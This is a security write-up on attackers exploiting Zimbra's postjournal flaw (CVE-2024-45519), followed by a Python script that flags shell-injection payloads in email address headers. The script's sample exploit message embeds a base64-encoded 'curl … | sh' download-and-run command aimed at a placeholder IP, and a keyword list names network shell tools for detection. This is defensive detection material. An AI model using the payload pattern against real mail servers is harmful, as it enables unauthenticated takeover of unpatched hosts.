October 1, 2024 at 05:47PM
Attackers are actively exploiting a critical remote code execution vulnerability (CVE-2024-45519) in the postjournal service of Zimbra Collaboration, the component that handles inbound SMTP mail, to take control of unpatched servers. Proofpoint researchers have observed exploitation attempts since September 28: spoofed emails whose address headers carry base64-encoded shell commands that a vulnerable server decodes and runs. Zimbra has released fixed versions; because the flaw needs no authentication and a public proof-of-concept exists, administrators should apply them promptly.
Key takeaways:
– Zimbra recently disclosed a severe remote code execution vulnerability (CVE-2024-45519) in its SMTP mail-handling (postjournal) service that lets unauthenticated remote attackers execute arbitrary commands on vulnerable systems.
– Proofpoint researchers have observed exploitation attempts since September 28. The attackers send spoofed emails (purporting to come from Gmail) whose address headers contain base64-encoded shell commands; a vulnerable Zimbra server decodes and executes them, giving the attacker command execution and, from there, control of the host.
– The threat actor behind these attacks is using the same server for sending exploit emails and hosting the second-stage payload, suggesting a relatively immature operation.
– The activity looks opportunistic rather than targeted, and its volume has held steady since it began last week.
– ProjectDiscovery published a proof-of-concept exploit on September 27, one day before the first observed attacks, and urged administrators to apply the latest patches without delay.
– Zimbra Collaboration Suite is widely used, making it a prime target for attackers, as evidenced by previous zero-day attacks and targeted exploitation incidents.
These takeaways highlight the urgent need for affected organizations to patch their vulnerable Zimbra instances and to stay vigilant against potential exploitation attempts.
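A mail-security team reading the Proofpoint description will want a way to spot these messages in their own traffic. The script below is an added example for this write-up, not code from Proofpoint, ProjectDiscovery or Zimbra: it parses a raw message, scans the address headers for shell syntax in a mailbox name and for base64 runs that decode to command-like text, and returns one alert per offending header. The sample messages, the header list, the command keyword list and the exact payload layout (a quoted local part in Cc with `$(...)`, `${IFS}` and a base64 blob piped to `sh`) are assumptions constructed for illustration; the shape seen in the wild may differ, and the check covers every address header rather than Cc alone.

```python
"""Flag inbound mail whose address headers carry shell-injection payloads of
the kind reported against Zimbra postjournal (CVE-2024-45519).

Added example for this write-up; not code from Proofpoint, ProjectDiscovery
or Zimbra. The sample messages are constructed to resemble the reported
pattern; the real payload layout may differ.
"""
import base64
import binascii
import email
import re

# Headers whose values name mailboxes. postjournal acted on recipients, but
# scanning every address header costs little (assumption: this list suffices).
ADDRESS_HEADERS = ("To", "Cc", "Bcc", "From", "Reply-To")

# Shell syntax that has no business in a mailbox name.
SHELL_META = re.compile(r"\$\(|`|\||;|\$\{IFS\}")

# Candidate base64 runs: long enough to hold a command, optionally padded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Tokens that make a decoded blob look like a command (assumed list).
CMD_HINTS = ("curl", "wget", "sh ", "bash", "python", "nc ", "chmod", "http")


def decode_command_blobs(text):
    """Return base64 runs in `text` that decode to printable, command-like ASCII."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text: skip
        if decoded.isprintable() and any(h in decoded for h in CMD_HINTS):
            found.append(decoded)
    return found


def scan_message(raw_bytes):
    """Return one alert dict per address header that looks like an injection attempt."""
    msg = email.message_from_bytes(raw_bytes)
    alerts = []
    for name in ADDRESS_HEADERS:
        for value in msg.get_all(name, []):
            value = re.sub(r"\r?\n[ \t]+", " ", str(value))  # unfold continuation lines
            blobs = decode_command_blobs(value)
            if SHELL_META.search(value) or blobs:
                alerts.append({"header": name, "value": value, "decoded": blobs})
    return alerts


# Constructed sample, not a captured email: a spoofed Gmail sender and a Cc
# whose quoted local part embeds a base64-encoded download-and-run command.
SAMPLE_EXPLOIT_MSG = b"""From: "Sender" <sender@gmail.com>
To: admin@example.org
Cc: "aaa$(echo${IFS}Y3VybCAtcyBodHRwOi8vMTkyLjAuMi4xMC94LnNoIHwgc2g=|base64${IFS}-d|sh)"@mail.example.org
Subject: hi

hello
"""

# Constructed benign sample with an unusual but legitimate quoted local part.
SAMPLE_CLEAN_MSG = b"""From: "Alice" <alice@example.com>
To: admin@example.org
Cc: "bob.o'neil"@example.org
Subject: report

see attached
"""

if __name__ == "__main__":
    for alert in scan_message(SAMPLE_EXPLOIT_MSG):
        print(alert["header"], "->", alert["decoded"] or alert["value"])
    print("clean message alerts:", scan_message(SAMPLE_CLEAN_MSG))
```

Run it against messages pulled from the MTA queue or from postjournal's input; in production the same two checks can be applied to `RCPT TO` values in the SMTP log rather than to full messages. A hit is a triage signal, not proof of compromise, and the check is no substitute for applying Zimbra's fix: an attacker can change the encoding or the header at will, while the patch removes the command execution itself.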